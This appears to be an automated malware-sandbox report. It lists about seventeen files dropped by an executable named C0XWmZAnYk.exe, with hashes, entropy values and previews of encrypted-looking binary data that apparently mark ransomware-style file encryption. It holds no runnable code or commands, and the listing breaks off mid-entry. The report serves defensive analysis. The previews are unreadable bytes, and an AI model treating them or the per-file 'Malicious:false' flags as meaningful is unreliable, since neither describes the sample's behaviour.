              Preview:<?xml.Gz....>..h.H...........p. ...d.|..^.^RH(].. .......-^#...m.Mn...*.$.W.t*iT..e..#k...v;...]>..d.&M...?K.I..'Y.+..!.zY.....Mt....<C9dS.....l.(0.5......A.4...p._.q{g...;.....6f>.W..!..'I..Dw..)z.g.(...@...P ............i.....g......Lb........q/....%...v.....5)..{$A..........3.&..bH.s@f.cl'76.fq...t<..8@.n8...b..n.....LCn.?.^46.v...C..n.`... .G.....0....?.m.EP<.n_5....2N.L.R..(Z..=q!...~.Vx.<4.m...$..\t.?.(..Rm;.2P.....u_..$r..Q..]E(.W$....:.2Zr...`..6.d..O....B.';..<K...78.pn8......mR8z.&9.h2f7.X....u..m}.:.^?....<..........F.+.w...Cd...7...$A~.j.g.1...z.f..;..s|0..\;..k.R...\X/o..?...Ng........~.MNK..).L~\Q..QZ.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.697511614663308
              Encrypted:false
              SSDEEP:24:7SlZieNLnev2UlJ9J0Dxh6fU0fCzBg4Dd+bD:kieNLe+UlXJ0DxsfV6zSA8D
              MD5:E8A936694432F6143EEF6D62BC6ADC80
              SHA1:407212C73C50A0BB649AFD230943A44DD190332C
              SHA-256:FC756F4D780FEC7AF6F26F2C5437266FD0897D411317F5E19B1B9E2039CD8C60
              SHA-512:E12035653A6C1B774638BE1F6FBA55518785BA55266F5069A1F14B764D1C7CCD410BCE2E59262C7FA8A02C63E37895649483EBF0906404646DC6431FDB710161
              Malicious:false
              Preview:<?xml..b@..V=..[R....uk.eW...._..j.>ZR..m}c.J.........&....$..>.g*9.,`..8..+TCc*..:R%.k.>h.h9.l.g_..P.5/.D(..l..cz.C>...D..k#Z..SN.T.....g[.....k..+.r.)..%;..;Z..::..;f...u.....m.\..~.1]....H<.u%..R....W.g..._ng..s.$[.....Kk..../..........+.u.......5'..i.3..G*.....Pj.../?f..>.....{-.../Z....r.*tc...&H;.Y%./.../.....d.M.NQ@....:@.&+...c....5.G...&..9X:...m........<Ej [f.....5r.d.../_.4........&m.t|-..0K....Tm.qE`....N..h.........'&......fp...<.w...X9...kK..'6'..j..5.Z.r!*...>.f8..].T*.O0...iN....+..c$.P..."..z.....j..z..C....[}ZEs.3...J."S..n.iP....G..Lzg.z.~@._.N.._z.\.p...5.@...?^....'..}_O.KZT......../..:.......M.1z.{R..-..{'I..._.BT".@.9.,4.w.p.bG.n.6......S;.......m...)eC.O..e..q.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):758
              Entropy (8bit):7.709769446743634
              Encrypted:false
              SSDEEP:12:CWdClZbW8EJZHgq2HaXXdWb9PkWOv7Bqfp1ZeUqAU+QFB+uunKUn8BNldxa3ciik:CWdCzbWh18aXXgbRfQqp1U4uIKUnQNly
              MD5:37E2A173B456077A318ECFD86E930351
              SHA1:3A1666D997189A49E7B06CA2015DF0E9B687262C
              SHA-256:5267849DD3AB632F0505CB4F44618AA94EDF73FB97F54E042A99C3978860F944
              SHA-512:9CFB9FA3A75AB6E84BDBBD8CE5DFEE1E46390C9203E9AB7EE48F1707D841ED6CB1DE03AF83EA164F0CFF62857A75D15FBC6008671F2CB804C2C6AB59406A613A
              Malicious:false
              Preview:<?xml..\..8..R....6..\.+....4....?_...-.(q.}...Y......h.=....+..s..6.<Z|.7_h.l;'..9.aO.4.@.H..a8W.......k:+@.To.NV............".<.U...&....U...O4.:h..=UJ...c..JL..PA...&.6EK.@.o....H#....j.C.....+.z.:.....Y`].\P..........=.6a...bIl......1.Of.?.>..i....D...K...+[..I...)..DM(..f....R.d.n.,.yP.#F.....`.....Pke/.cz.....S......C^F\.....p<.L....B......Ji..A!F..k....\.1]l.#.W....o;T.x.......u81.|.`#.N....w...q.:...w!.c>...Q.G.,.....^Y.$cPK#...W.U..q...dvRY3.Q.e._..AM..FB.......L&..&.#.$..\'9. d...O+B.c.BD....1..$y....H.6.n..#.j...v*xx.<Fj.;..oVS-4S..7...T<.....MF]T..........Y...?..z..........."-.. ...'..y.c.Al....1....7......3.Dd...D.sQ[.rq..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):7.781885941429523
              Encrypted:false
              SSDEEP:24:8UnItT25OuDWA1q3FKfEF23MKI3XlkvWLj9pqZGd+bD:8cjKiq1KyzqOLj9IZ48D
              MD5:013536E67E4EFFECF883FD962388D57D
              SHA1:DBF508FBF4E0F19B52C36FF7EE3C6F56F17C77BC
              SHA-256:E0FB0B3754B0DD9FA577A76368660CA54CEE444362209A47F4E28AB5E5753A55
              SHA-512:DFE01078819E7036DDC6EA30CD74CD45D585C642C2D2F17B5A6BDCEB2AB76F554B72031DD5F577891086A2E40E8245A6B279ED51996A8C2C9B100C450BA0025A
              Malicious:false
              Preview:<?xml....6^...57..gD.m....LO.......\._.).3....@.q...g'f&.XX....*....w+..*..V&...(8...).b..g.#....{.R.....J.i......&.>........S*Z.@....s.ntq.l2.m.d.is.-.I.uG.;.w..^..MJ.i..1...18....'z.....Trn..hd.NO.o.8..>Z.."..dBm........z....].?1..2.....8..C...GZ.i.."..B.....pu..u"6... ..;~..fF..W......M.rO.......n...k.....e7...b.o.V8...7QO.....bE...Zu]...^....e,......._c...gq......j./...n....M<......m..u0m..'.$.P._.J..e...&.......!-;Y."..;1.;..S;.8.)....rk..d%..d..J..,....1..$.4f.`.......2.9...@-166.s........:.... ......<...z....\O..9..c.rhN.~..)...$F..`.T....c..V..&..~..s.$...a\.DU..K..+(....... ./.WJ..."u...G........o.H~.c4..3......'....j..)o..d..-k.D.V..XiA.P.u.L.C.WC......|.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):781
              Entropy (8bit):7.721534359619863
              Encrypted:false
              SSDEEP:24:AA9SWBhCgtLBH66MbA4PTjO7BpoKbf3ZM5d+bD:AkTftY6B47ipr+D8D
              MD5:DF5B07481FA9795F191A97F1B0F781FE
              SHA1:CF2C413D9995CA7E578C3078463D36CC1FBDE3E7
              SHA-256:E5982055EB1976A32DAEE7D9A2D7D24B69745C058D35CB5800F85922A6AAC575
              SHA-512:96A0A7739ECE06A252D4C4A0F08FFCC7E62F0ACDFAF5E9E22BE2F967E275A6077901D9BBBA278DE8B77672FDAE72FEE882E3DCFE598A8FB86EA668E501354D35
              Malicious:false
              Preview:<?xml=.n+.ps.t.".8..!.Eb.........^"..".I.4L0$.......g.|V..6.C.9...!....S..(...*...S..h.B.U.........N.15.1.......Q..T.D....B%.....U.H....+...O....q...2..@Z...y....(.[..Y.5.E..D.o\.C.u..b=....!....!.t.E.5.........9.utt..s..AY]%E.....<....*...JD...|../}(....4>...4...%.....w.............!+..D.x.TC..8..._..g......38.Y...d....<.?u.NU..G......c..m......N.OpA..+....)w...(.4{O.|=6..=#.6@..Z...x.a.>...P..b....I....:..'.s1B......Hy.a'..o....^..%...h..M.......9v..q...X].4L...].....*.8..G....].X......2a....s...%:..Xvs..p..}.;.:H.o...>x....>.Z^..*..J'.'!K.`...;^......c).|+a.{.Z...q6D..c.K.m....t...{{Q..J.!..Pw.9..E..o#+.MM5.Y.|.0VpRfx*.....;.;U..Y.P.p..%.Cu.Wq.:....J.*...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):824
              Entropy (8bit):7.74693386732825
              Encrypted:false
              SSDEEP:24:Tf93L0E5pNDid/C+xrdh9KrkQfYG+O1imPMsp1665U3mg/wLd+bD:xL95pNDixxrdh9ckqYG+EdooUWes8D
              MD5:8B12A11E7A48F1DAB690EEA3A146E7E5
              SHA1:606AD1AAEF3A9CBDC1325FBCAA51B90B7FE5D0C0
              SHA-256:5CA781A46EB7BE56D19137C683D490A6A1FCD8134BE85CC0917FE62A0CA21932
              SHA-512:BB18100C2A291D717E472FCEF92EA9FFC0D729F5C4EBB884A4755574920975960BB5A6B061B4F8A5C8BB1B78BF373055104740B34810C5E8E54456A1B1121312
              Malicious:false
              Preview:<?xml..;.....~G.v..r.@_Psa=|....[........;.SQ.M..L.Uz..k].....m{rN...'..N4.6......0'.@.w._h\......#....).N(. ?..W<.u..K.G..*.W.pQ..r3.e........c..E..X........<....(q"swK.Z.1...]..........q....I...@..{.I]BJ....a.v..(.J\>..@.....).Zv(.....NT..e..i....%.A.z...#.I.z.]t....O.X7\...nf.n.._t..j.....e3t;.^$.7..(.|.@...i....s.M.R....'5w.gM .1...l.#V.w...G.....1...u...f....ty`(...........}J..@.. .d........N.....n...ry..`~.._.....QQU8.{..P|.F..9#p.....[.?.>0.;...Q...y.z%uqB....0.U..w........9r..Y7...Do....1..k...!..-...'').8.....D~..hk......R....z.*EPHf..<^o.3A).8M.k...s.....8v....;.=.,...~......S.A...+DD5.f6.U<..qy.Y..3.......bS2....:X....Q%1.=.`....f..X...J....!.........a.N..6....%A.;Pv...m.P .|EO.O0.=...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):749
              Entropy (8bit):7.727956701092421
              Encrypted:false
              SSDEEP:12:+N/MkUKgoY+oisHMDC11d15GWcj67lOmyAmpU4Ev8g7jkJzdYLieBKdxa3cii9a:kRg9+oQDu7TcqEmy1BSLuzWKd+bD
              MD5:BA39D5D040E2D107EE477E7C9ECBF44F
              SHA1:EFE8C9FC85D75A87FFACE059E092EF193DA7C132
              SHA-256:59A4592EB0B1DF2DA84D8C796651E9A5E9ACF8D3A65C12CFEADAF3BCA9A6A72C
              SHA-512:30A0D2829B5301B5EF6571CFD8CEEDB44349920281576A2B7BBF8BEB2BADB782CAE633249F891E6BFD737F2D58B6DAE01189479CB0F136CEC924AD9F0413B69A
              Malicious:false
              Preview:<?xml..........].XA.`...-...o.".8.=...x..pL...;...v..k,..x8...yX..c.z...L....]...#jE....j..P....?(j.....{3{.EX.u.......\..4.P..;.U......L.[......B,...^:...l..M....e`..o{..37:...gF.Cp..Y...3pw..6..B.3.@..>xyyW.K.....:....K..h....s{.x....!N.M..`.4.|]b..[_.7S..^b. $...xwO)....A..Y\.cQ).}..%..M.r..z.<..|.\d.>/v.....,..FB0 `..&..?1o.Ju....R...o..k.....Z..d(}CR.!#.r.Y.-U1..?QxE....$.g&.....7SVg ..$....[...X......N..'..h.....4....XO-y.9.Z.}......I...J*........j...Z,._..f............M...A..... ._NH.YB.@Q..<.Gz........./..);...a.[...cu.!:q!.....".v[.d".dG..u?..bE.>..w...lS....SY.(2....-....]....../(.]...2....e|J..C..`..0.b...4..n..h...F.4W.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.7109953034412495
              Encrypted:false
              SSDEEP:24:l9XMXiQIOiyNVqxkl39LWfSKJ3TX6AKd+bD:l9XXQIoN9w76N8D
              MD5:4E68134E6E11BA6B7C89AF31F2D89024
              SHA1:A2215BE2D2E973C4D65F477CF868D3125B9FA2D4
              SHA-256:DC84282F09002794DB20A93DA67767FCBE005337B9762C9E300CAA6BC1C528C8
              SHA-512:33E55C33A3AEC4CC723CA5C3A47A8111AC6030736B46B3CA74B384F8BEC40E719D0A2D89AA2B6B78FF09F2CFEB802918CB6BF534CCBB192758CF30588F0BBA16
              Malicious:false
              Preview:<?xml.Y.v....C:........YM.9...C..U.......p.v......?o..u....b.`.&....8..p...|..>@.@..n.%.d...F.:....]...M..........8....D.E.I.Z-...p6.czP..L..`..K.....WfM!.........^.[..U.....#.%O.....sF#vK..[.....\YI6.z)j..x..hi.4..@.9s ~(..H.-6. .%.W..m....../.:.... |!..........yy...n3...cd...iO.d..TW..f;:A..DDP.....9E......B~.....B......N..lt..h `r.o.......g.....&j<`^:.h...S..U.Yw.X..+.u.E...]VJ6').ED....).94....p..l.}...(.!..A....Z...5..c...~.?+.. .B.]%.w.....{......7...-..".<....v.....i..#){..G..1...Gz..`....[.:..K.+.D.z).+..t.<..*..k..('......7[3..O.....8|F.i."1.~...t..g.qxk..~K7..._.....c..A..q.(.r~t,}.E:9.~|..2l.#@z!&.i.NS....t.1'....B%]...M.q..|Dc.&..D._}..z...9..#O...y...P..dY..t_...^.#;.......o..T..Mb&[FP.e.]gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.667442497966525
              Encrypted:false
              SSDEEP:12:2R+O7IWa2OLvsWxQ5PivCMz1AVmD7K2FJcSMx9dK62qMyuVm3dxa3cii9a:2R+ga2OLv5CPiqMz1WmvrpG9g/qrAm3y
              MD5:D6E5CDF418880F0EE241E05864B7B95D
              SHA1:770554B7165A01375CB0F37D40366540BFD80B5A
              SHA-256:ED096F73881A54AA899F6346696314C35BE36CA206DE4F7820B084EFAE5A1268
              SHA-512:20B716EE3CD2608FFA775B29FAE376024568286C0835C56616C87A4520EA4F6EB9E1167CE80E42A98A96FBFFEB9AD22B44E2C18414F4169A0DAF1AABBC9494B4
              Malicious:false
              Preview:<?xml.......&b|...M...4F.G.t)......$...L.}p`BZ<?+.i.w..D.|+.j...bo@.. .C". ..A1.....i..J.y.?E./.....>........t...z{b..t.u.).2'.S...+.]N...[..o..f_.L..ZMMAi....wy..w....pa.u..R..Laq..n/.4+..t_Q.,;....t...A.?.Z....[...W]6........t...<..t.....L.......'.[.i).^y.(1..q.N...D.2....W.UL.N.I%j...sG..J*l~d....9}....Rwl>..:...t.,..\.H..*..Do._9I Fm.k...!..c .Y}A..Y.v8..........!m........Pz.....{...*h`..Y..`"`...%...H......L.p.z..=...c.vt..Q.z..(..l.H.8.z.F...L..R..-.N<....L..k..c..j8.r.E.`...k.w.pr`..]..]..l.2.G57.<yf.".9...w..KJH.bw....@.).7.*A..)\.gz..R`....C{.r......}.........2.,.............H..\X.!......r..7.'.....,s?..f...7......c...1kgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.731114763746927
              Encrypted:false
              SSDEEP:24:NmiKC7Dx6EhsTFJ1nRyiH61sCaKWdv+tIHCv+Pd+bD:0kSTFs9RYtV8D
              MD5:4B4762BDE323E5C05DC502D4497AFB44
              SHA1:2E54C81D9893D6F7E03AF9A81886135ADCB01D1F
              SHA-256:DEC9E2298C5E85183BB57E6DB82BC77369EA4E7A6746BA66ACD3C9823C8D26FB
              SHA-512:4FA50C84836985A57729B76AC9A80C09477BF08A725F8CD25F2AFAAE7793E7F1A325A64137FE25621AE279BD363B9C8429CF13F10029E160CC772A52D05ECFC2
              Malicious:false
              Preview:<?xml...&.R.....+.%.A....z..R........<.i....K......=Lh.J#F..Q..]a.h.D.3..S<.R.7}.....8>.(.{q(o........;.*<.].6?...V..=.U....kv.:..h.w..Tz=]G%...y....K?.&1..$.%.d....b.=..44......K.........d.!..D...w..n.U...#A..-...m#..f.}...dt.W.m.....PVh..A..,.ie...9......./m.!;...H.N..NGLu3.W..$....X\;v.....w5..@..=..?...*A.rc......B..C[.g\!s.....A...+.Nt.-...]...6...x%...S..\.d?....ppt.....^.!4...=..8....[..o.^._...#.-m...r4g..V....q.U..t|...3.E~.J .R.9&........!....%..}\.R].....y.M.....f.a35<.r...^...c~.zV].'.......T..w.d._]$..^..<5...zB...).s......C.&... \`.2.}.yzm.......p..z8. ..Cn..JR..VJ.....:..Z6?..........v.KXJ....1......r.r.=.EQ.......y.c..."..........}.....U..,.....A..S...+.hE...U e..?..!gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.702062668496879
              Encrypted:false
              SSDEEP:12:MJTbG60sVOLYj1e0TfPXzlOYVkeVBF5TMBoEbiqd/LuCjePbEKZcn2JLdxa3ciik:4n0S8Y5HTxOYH5TMaEmqdzuCyHaAd+bD
              MD5:19E9AB123F51D0792A4395C0DFCB6DC7
              SHA1:AFBBD949810E9051B9F59DB39D877B4BE3F5B6B9
              SHA-256:50F46372FB74F13770D76FAC5AE1ED8606CADB904EEAEAC18759374609725D9A
              SHA-512:1CBD2A5B7B67A78FD015D2B0F9698F5EB845A56D09CAC0FB53ACA687FF678E765C4C18C4B69298AB7D4AD1FE86FD9BB8F25EFB7FFB2F951F65A99DD36398CB6B
              Malicious:false
              Preview:<?xmlh]".t.!.\o....{.S..r6..&...(..e...B...&...WU..?2....Z..'......J........5...Z.@..U..kDor.....h....!.D..i.....9...].....^....'l....A.u.}....D.....4....^:....4..K..,._.............C......CZ..{V...g.P-.9.f.G...}..nU.P8..r.T..B..v.Z$6..]o.......7...xor.fV....7.LO.(..q...{....A`......L0q.?R.h....Q{|0.5.#.....gR......3...A...z.o...U..-.T.....jV*.s^..!.?........,.(T..\...n...............kY-.?%.v,.v....2!A#0'm..t.......=m..j..~.#"t..u.(./h.....*..u.M_mD.O...nT.P..&.f.....&.m...../...NN.^g^m...B1bO....+m..(`........P)a.....&]6H>..8.Wc7.O..X..Vskr...6.y{.V.KD;!.v.H%../.f..C.q...|.|.k...eC.o7...R`..........6.J..km`..6Z..;BP..)..p....3...K{lA,gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.7213860837046004
              Encrypted:false
              SSDEEP:24:i7WyHBAAee3XSjAQeXzUc2eQtBhSFd+bD:iyBeS0Qeh2ekzS/8D
              MD5:44A7AD7EFE87F001A470490AD2717265
              SHA1:E817A024BC2260EA2F0EF0FAD115BB71FD804E35
              SHA-256:E6D1F736E64053E1DC1768808A9DB583D0F8819818DA539434BB9DA79CAE68D7
              SHA-512:816E0F488A1719E14DE2B8BBA3FD001507F8F6EBBC8A7586AE49C8DD5B96C754663DA824A718B2FBB2435AAE18FE848EDE33D5612D477585EEA3A155AE8352D2
              Malicious:false
              Preview:<?xml..@o. 1.I.&T-....W.%._r.?..9...Hp...s...n#u2...wEU..%(p..G...Y..##V99.......[Q..t...o8..+.>.).5q)f..9....KA....m..K..P..!c..Dg.o...''.x.L.Pg&.....d.;4.....(f..3K.`..s..:W(.......he....k..b8..sdS.pi...=...F.l.B..H..\....i.3U4I..4z.......|=......a.._C.."....o.4^.C./@.f...z.,_.`.DM..+.p|O.)..e(...z..<\..(x.....l.k..{...hc....u..+oV._.;b.V.......m=...ka]....W...-....n.8..m..=v./.*[Q.?..!..j.......`........r..k......}p.h...`y.{.....h.....`.....I .[O.^t..m..w.%x......i...W...Sl..Do.9I.h\z..w..|.k......'...U.Q^.W...j..{..g=<.U......:%E...D...z].9^.5.u8.zv..D\2......{..I....Y.u+..|+.>.0y...*.M.0R..O......=...F4b....5tQ.V9.;.....m..boD...u.J.M.TV..`R.....c.....9=4.#.1.._...4......d].<.E...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.724224519051288
              Encrypted:false
              SSDEEP:12:4ZOUYfaVfv8Sv33Cv4TQY7W/WCII3v5Iw0j0S0dXndxa3cii9a:4wUYfaRv33nLmLt/5C4SYnd+bD
              MD5:0755B4055E20C62CF0D7A2851BAE3DF1
              SHA1:81AF4DC9EC0DF66CF5871C4AA1DBEC9D7971C852
              SHA-256:3EC525855773320F1E6F1112CAC23C755E2A7EC9698672175514A7E73B8BC559
              SHA-512:52A5EB5EB718457DC54CF785C9D5B00BA6B5BE9FB921F8F2EDE9A76727CF5606EB2AB28F76779AF36B86D1AEC22AE751538F4AEBD49AA5820F03395EC240CCCE
              Malicious:false
              Preview:<?xml......b.~......Iru(X6.({.7_)5.E..^../w.'n..I..VrjWo.a..]H#...x-E.;.Pp4...B...._..]...=&.f...B.+...Z...P..3..Y*.e...E.....{.^ .1..6.4.t. ......?9....~). ............d.p....5$....s.J.?...9...o.H.........G.i|..+QGw|4..Hf.nN..R.a.....7...!Wf.TC...d{..|C5_.@.c..".E....4.%.P......&.j....w..}.....\`B....I.[S$yT...ake.=#.K.A;...$...EW.....{..I_As@.....Q3._0.H..Wp.........{%._.q....><.1d..k.C&..L::>........ 0..T.g.V..'...'G..I...c..E.P.s...F.....P.p? ....$...:..l[./.....s..............A....6....;........r..U...;....n....W6...`...2..9..M.'?0....3... E.....n..\..1..{..........t.]"jLm....x..Br$7..,;....R.&...sA.?[....L.._...<....b"..dl..{gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.738014861906723
              Encrypted:false
              SSDEEP:24:3Oi7Dtyl2yis9vbtniEjxa5k9Vp5xS4d9t3jd+bD:3R5yrRZiEjx1Vp55v8D
              MD5:66BA47A3F804640E6F03637EC7BAC543
              SHA1:7A9E265069A464778EE1CE16F1AE5614CB6C649A
              SHA-256:8473B24A168337F889FC37F76892E4636AC5222B8EB65E67E7BA010A4C787263
              SHA-512:5D914F9B428924EFE2CB404D73AA240455FC05ED9FEC87797F1175F22329904EC2D6C060BB9A6181DA68029FD64D3EA1640A1CD396B262248E1D34866F04D9BA
              Malicious:false
              Preview:<?xmlG....?..V..w......~.j~....D3h..,.6....+.b...\|..&XIcJ.9-R..L';..j.....9.......4Hh.D.8..sn..:..OT".(.ogf.V....Q.?+..5.........^.....a.....Qz...m..B.5.1#.|.F..`z.{a.Q=...$.y'..X..7.........Li..C...<....Qt;....>.}.Q..v".....V.=.{..MC.....L...6`..0...`|..3~..t...i.Bxq...zTW.}{...@...=3<6/.!...P...g._...SD.00... ..We..8a.6DSP1....xt3..0Yy+....y.TMA.x.}..v........:*wQ.S.|,).B..Ya....v.....W.e.)a..*.v..GKj.H[....t....h.e.(Fr.%..=..gifCI!....j..B.h.....8..#.w7.3..........=.4..w.W.).....k.b+z.i..M{...*.u...G.[..U....}$M//.iy...Z........~%)..~.?..q...4.PM..`.S....)?.P.5........D..~...C..h.{..B.P...z...-..q.O.=......c|Wvv.9.\..Gt...p...<....dO...}e.]V.Yj...%....$N....]g..e..fut.S.(...h.g.r..+.?...`._..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.655598326881372
              Encrypted:false
              SSDEEP:12:hI1Hifs0WrKIOzZG62WebO8eDDlLN08eZaJtmUM5DuP2ie6FG4niAoil/atLdxan:hI1HOvIOk6LD5DDlJTeZaJtmxdie6F9/
              MD5:D358EA43F9928BF8599E754B7F251249
              SHA1:B12F76B61675DC5AB10FC16DAA6929A398253C68
              SHA-256:D4B9BB3F9B3233046C114CE247BD4B5C52DAB0C28921B0AF7B8B96B2CF3A00AC
              SHA-512:608B3BF264AA934717B8D2F2F127F9A5371818013065D627D1F63FADBCFD5882B590CCD5CE681E7DAC1D8FB193F3D4F95A9D4C4C3E7FD5AF2B8DE3E0F6D8928C
              Malicious:false
              Preview:<?xml.6.M.s_.....VU...:...r......<...4..%.d..y...m9........E...|A...._j.$_{..f.!9.j.Jso.6/..`g.......6...e.o.."......J.~HJ..Pi.........h...N|n....<(b.U?.m.JG....Tu:.+{.v2m....G?{@......{{...^.Y...l.Gd....{lq.G.W..)DK=......*.5.:.2.n.....V0........n9t^.Q.K.....=z.X7pDa~E....j...!.(3 .g.q>.@...4.e:.k..QK..V6..Q.?.I..2r?.q..2P&.Y0"Hh..J.Z..h..s.h...ka...H..9.?u.9.T......]....h.....~_.6.......B.....v...&!i.9..........)8..]M.l'.....*.UM......&%...t..`...j..t.4$.V.../$.0k,......4*G.X...*.(..q}..P..Sk.&.>..a?.i..b.>.B..$.~@Es...+pV!&...4.&.v........8+WY.....0i...o..Mi...onr...4....~....g-..t...F.....4..[.2...i]..s.h.._...I.......vuSN..FF~gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.7031514105848
              Encrypted:false
              SSDEEP:24:i/UUlKq7fpV3cZqg1FmekEMSvdn7PsHuG2pd+bD:i87qzpVMZqIPOSvdQHx2z8D
              MD5:2685A49592D1195C47E3FC8591F32877
              SHA1:78E2ED1C54C68E81449D858EFD083689C4AA1212
              SHA-256:64BD17DCAE7C7E8B5D10CD1165AEB94F20B7F450ACA7FC5463CF32D04919EB15
              SHA-512:D7271116D20DDEF6393B2950421EFE0784D044F97281525287FD48288238043C73D2042EAEF367ABD2FFE3E7559FDF4F04C6DCDFB1C57DD7C5C314BCBA28D135
              Malicious:false
              Preview:<?xml(..i|..G=...+....... ...Q...IY#. .KV....v.....pa.a...V.u......k..6).V\8...nz7.U.6.]l...........K......K......iK,..e'E...pC...1.Fe....x.|.:..\7B.R.S.n...b7..k.~a..'.........".2...a.GR.a...+...j..a.&..F4....K.n...yyn..C..l.H....F-.......z..E...A.Y2.r?...i.B).....,.6.i.a3IO...\....`........Tl.2.w.vh.qA*..j.5..C..d.E.'(.s.B...{JQ....'.-....1V...R..%.*....:f,F8r./.6L.".u..".R.C..~DQ\A..uh'.ke...A.)i.../...k.Y+.G.?...n...1...{k.`x.....kJ:!|Q.N.........N*....(5....vl..3=&..h...v._...D...md;.zd<..Bf........."Ni.3.,.:..."..~.#b..L.1....e...(R.'I.F...b.....hV .H..om..7.....a...I.M57%..Bo...>...9..<.w.6.z...)...O96.....#...#.Y6.i.,!.?TC.\.n.5./>^.w.....|......K.n.:..:o..AX.!.k\L..K~.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.766052835406674
              Encrypted:false
              SSDEEP:24:GyweCAOKVYCaZnewO8oi8yui+J0X3Rwd+bD:GC0K69ZnQiDSGm8D
              MD5:720FF2E3E4D7817DA877012C91B5DAEE
              SHA1:7EE3795BAED805094B6C47EB75CF8F471309BDED
              SHA-256:FF149C4DC37E4CC9E611D014A44698856A9AA1183438DCA98D1B1154F394B6F2
              SHA-512:06B211C281F86AB4BFA7CE1E432C7F37851CA7EBCEC7018A3F3EAA37D9568D6A24B604A5F6095B4B6D22A3B84E813B06CE68A574F67CA441BC04D8BEB1C97DCF
              Malicious:false
              Preview:<?xml2.f....L.....+....'.9.Q....o1.9&l....lA.._..I~~v..c....:^.&b.(}....j.....?.FV@.9?Z.2L4.Wv^.......<."C...........Y]G}.....z.NV...t.j.'..1.\*.......;.z.e|a.\N...=... @..M.9..C.p.)H.8...,!..z......m...p.-'.^...i...)PqB..Z........d.P..A....K[-X.....B.=..mhr.=Q%..gx,..>.O.X.......7.8....U...1.....9.....A....n.i._....=.A.......v.........WQ@..r)ic.8>..3../..iZ.d.."..M....\...b...h.@)IL.eu.#..I.?#.....%.=.9>.v..`.+.0.}.-....Qbc....c..K...................)0U.tX...d...y..A8.qD..v*5,R.NzW.6<. .q...t.g..U..[.z".NfZ....s.#.O...K.l.+........M..D.0....&.#5.}.p.g.66w.`..q.O/Yd}W..m."aN...".{.+.:..a.A.R.4$.V.........V....A.?h.AE..A.`.......-x".....=S...K.j.c*IHk..P..k..X...g....../.y'<gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.654213259729486
              Encrypted:false
              SSDEEP:12:uZIpmXWBjks69IPcF6VEBj5uO+vn49m9M8QU+3A80iYOOc1GSmsTIXgLdxa3ciik:uZkkgIAcF6VEBj+YUmHskISXIXgLd+bD
